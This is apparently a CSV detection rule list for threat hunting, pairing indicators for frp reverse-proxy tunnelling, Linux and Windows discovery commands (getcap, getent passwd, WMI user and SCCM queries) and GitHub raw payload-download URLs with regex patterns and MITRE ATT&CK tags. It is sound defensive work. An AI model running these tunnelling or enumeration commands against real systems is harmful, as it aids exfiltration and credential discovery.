"*f1dc0436b7f9f3f5c5d404cf5fb4a7319ff1cc22a06a687672020af620693f70*",".{0,1000}f1dc0436b7f9f3f5c5d404cf5fb4a7319ff1cc22a06a687672020af620693f70.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f2f9c488451676a58566f6daf2a8a1c85aea193abdc7d7241ef0e12675238bc9*",".{0,1000}f2f9c488451676a58566f6daf2a8a1c85aea193abdc7d7241ef0e12675238bc9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f300f69fe05b47e3b3e571a1fd83c7c0f7d69667d50a78ccbaa551bda3078169*",".{0,1000}f300f69fe05b47e3b3e571a1fd83c7c0f7d69667d50a78ccbaa551bda3078169.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f39f10c0867a52eb9e4d2adf0bfa821993c950feca35437e84d274fba00bc595*",".{0,1000}f39f10c0867a52eb9e4d2adf0bfa821993c950feca35437e84d274fba00bc595.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f4cb27fb222cdd87a30674270614adfd0aa8350034a8bdbc50fc1967c0f0cb66*",".{0,1000}f4cb27fb222cdd87a30674270614adfd0aa8350034a8bdbc50fc1967c0f0cb66.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f5031cd5e3b444296ef19016555560b69b8f9b54defbbd7e8202b9ef86510d4b*",".{0,1000}f5031cd5e3b444296ef19016555560b69b8f9b54defbbd7e8202b9ef86510d4b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f56461c7a75839fa5ab3f8be2988f9f5d57c8121c4d7c31e17d2d3a7447d2a7d*",".{0,1000}f56461c7a75839fa5ab3f8be2988f9f5d57c8121c4d7c31e17d2d3a7447d2a7d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f5acd6dd3812f30ed6a2a2a864231563a962d4ff09c64d21be106db6f8806af8*",".{0,1000}f5acd6dd3812f30ed6a2a2a864231563a962d4ff09c64d21be106db6f8806af8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f5c9543b4b7731b40ea5cb0ebbc655d631adc7f2eedcea1f913e3d4d96b51b44*",".{0,1000}f5c9543b4b7731b40ea5cb0ebbc655d631adc7f2eedcea1f913e3d4d96b51b44.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f644cc4d5e23d896721d1eb59057a5b42d57676ffd7c81bd67b9c33d7db3e4f2*",".{0,1000}f644cc4d5e23d896721d1eb59057a5b42d57676ffd7c81bd67b9c33d7db3e4f2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f64a03af886034ad8380631ef1d65728175f5af79674af39c29978a86c181c7a*",".{0,1000}f64a03af886034ad8380631ef1d65728175f5af79674af39c29978a86c181c7a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f6b96c46d8395d08ae91d5a19d55f8c9f19d512207612a89ca4c79df0c2f3c5d*",".{0,1000}f6b96c46d8395d08ae91d5a19d55f8c9f19d512207612a89ca4c79df0c2f3c5d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f8b9c30d3cef82aebdf5dfce8ba7d6a4943a4b51ef64223b59c5241e3023d8e5*",".{0,1000}f8b9c30d3cef82aebdf5dfce8ba7d6a4943a4b51ef64223b59c5241e3023d8e5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*f9c6ad68a9e3903d1689cd85e84f00aa892a9e98b368a9f062599da9d2cb4967*",".{0,1000}f9c6ad68a9e3903d1689cd85e84f00aa892a9e98b368a9f062599da9d2cb4967.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fatedier/frp*",".{0,1000}fatedier\/frp.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fc465df713f8c9d63c9380aa9da72b6ef639fb44917aed390d9c4d08c475a20d*",".{0,1000}fc465df713f8c9d63c9380aa9da72b6ef639fb44917aed390d9c4d08c475a20d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fc5c5c5ff93300cea3141ff55fbccccb07cd0017d4e9cd4bcd324563f88f53fd*",".{0,1000}fc5c5c5ff93300cea3141ff55fbccccb07cd0017d4e9cd4bcd324563f88f53fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fdbcc2a7d73552e690bc9ca7fccb69b9efdf10fc4d78f0f7c63b14a9129bb116*",".{0,1000}fdbcc2a7d73552e690bc9ca7fccb69b9efdf10fc4d78f0f7c63b14a9129bb116.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fdc0bca8460360346991a0f13e25233c87805bdc0f055f221f9c57c33b3b60fa*",".{0,1000}fdc0bca8460360346991a0f13e25233c87805bdc0f055f221f9c57c33b3b60fa.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fdde1a3e82d043cdca44b13c45e7593b61707385b30e919c38615d02d53e4b36*",".{0,1000}fdde1a3e82d043cdca44b13c45e7593b61707385b30e919c38615d02d53e4b36.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fe1eaa0c7066ad45a8a13838d15a6a6535e69250ecc3ed8c48bfb480c8b87e5a*",".{0,1000}fe1eaa0c7066ad45a8a13838d15a6a6535e69250ecc3ed8c48bfb480c8b87e5a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ff71979ea17d481194beba325a55f5d2a319175ebc6a80df535a202a43614f24*",".{0,1000}ff71979ea17d481194beba325a55f5d2a319175ebc6a80df535a202a43614f24.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ffa8edd59c275f6c592835b11b1f00e7c83c7d1e91aa8d9f6d666d286e902017*",".{0,1000}ffa8edd59c275f6c592835b11b1f00e7c83c7d1e91aa8d9f6d666d286e902017.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*fff687bfe2b84105d847369852022a26a6101d839cfdb1ecc88a45d1683a8709*",".{0,1000}fff687bfe2b84105d847369852022a26a6101d839cfdb1ecc88a45d1683a8709.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frpc -c *frpc.ini*",".{0,1000}frpc\s\-c\s.{0,1000}frpc\.ini.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frpc reload -c *",".{0,1000}frpc\sreload\s\-c\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frpc status -c *",".{0,1000}frpc\sstatus\s\-c\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frpc verify -c *",".{0,1000}frpc\sverify\s\-c\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frpc_windows_amd64.exe*",".{0,1000}frpc_windows_amd64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frpc_windows_arm64.exe*",".{0,1000}frpc_windows_arm64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frps -c *frps.toml*",".{0,1000}frps\s\-c\s.{0,1000}frps\.toml.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frps_windows_amd64.exe*",".{0,1000}frps_windows_amd64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*frps_windows_arm64.exe*",".{0,1000}frps_windows_arm64\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ssh -o 'proxycommand socat - *",".{0,1000}ssh\s\-o\s\'proxycommand\ssocat\s\-\s.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ftype *findstr *dfil*",".{0,1000}ftype\s.{0,1000}findstr\s.{0,1000}dfil.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*ftype *findstr *SHCm*",".{0,1000}ftype\s.{0,1000}findstr\s.{0,1000}SHCm.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*ftype *findstr dfil*",".{0,1000}ftype\s.{0,1000}findstr\sdfil.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*ftype *findstr SHCm*",".{0,1000}ftype\s.{0,1000}findstr\sSHCm.{0,1000}","greyware_tool_keyword","ftype","will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*pooljnboifbodgifngpppfklhifechoe*",".{0,1000}pooljnboifbodgifngpppfklhifechoe.{0,1000}","greyware_tool_keyword","GeoProxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*getcap -r / 2>*",".{0,1000}getcap\s\-r\s\/\s2\>.{0,1000}","greyware_tool_keyword","getcap","recursively scans all the files starting from the root directory / and lists files with capabilities set","T1082 - T1007","TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*getcap -r / 2>/dev/null*",".{0,1000}getcap\s\-r\s\/\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","Getcap","Enumerating File Capabilities with Getcap","T1046 - T1083","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*getent passwd | cut -d: -f1*",".{0,1000}getent\spasswd\s\|\scut\s\-d\:\s\-f1.{0,1000}","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*Get-WmiObject -class SMS_Authority -namespace root\CCM*",".{0,1000}Get\-WmiObject\s\-class\sSMS_Authority\s\-namespace\sroot\\CCM.{0,1000}","greyware_tool_keyword","Get-WmiObject","Get SCCM server with Get-WmiObject","T1087 - T1018","TA0007 - TA0002","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1","1","0","N/A","N/A","5","8","N/A","N/A","N/A","N/A"
"*Get-WmiObject -Namespace ""root\directory\ldap"" -Class ds_user *",".{0,1000}Get\-WmiObject\s\-Namespace\s\""root\\directory\\ldap\""\s\-Class\sds_user\s.{0,1000}","greyware_tool_keyword","Get-WmiObject","Get all users","T1087 - T1018","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","1","0","N/A","N/A","5","1","92","20","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z"
"*Get-WmiObject win32_loggedonuser -ComputerName *",".{0,1000}Get\-WmiObject\swin32_loggedonuser\s\-ComputerName\s.{0,1000}","greyware_tool_keyword","Get-WmiObject","Get logged on user on remote host with Get-WmiObject","T1049 - T1018 - T1087","TA0007 - TA0002 - TA0009","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1","1","0","N/A","N/A","5","8","N/A","N/A","N/A","N/A"
"*/github.com*.exe?raw=true*",".{0,1000}\/github\.com.{0,1000}\.exe\?raw\=true.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/archive/refs/tags/*.zip*",".{0,1000}\/github\.com\/.{0,1000}\/archive\/refs\/tags\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.7z*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.7z.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.apk*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.apk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.app*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.app.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.as*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.as.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.asc*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.asc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.asp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.asp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.bash*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bash.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.bat*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.beacon*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.beacon.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.bin*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bin.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.bpl*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bpl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.c*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.c.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.cer*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cer.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.cmd*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.com*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.com.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.cpp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cpp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.crt*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.crt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.cs*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.cs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.csh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.csh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.dat*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.dll*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.docm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.docm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
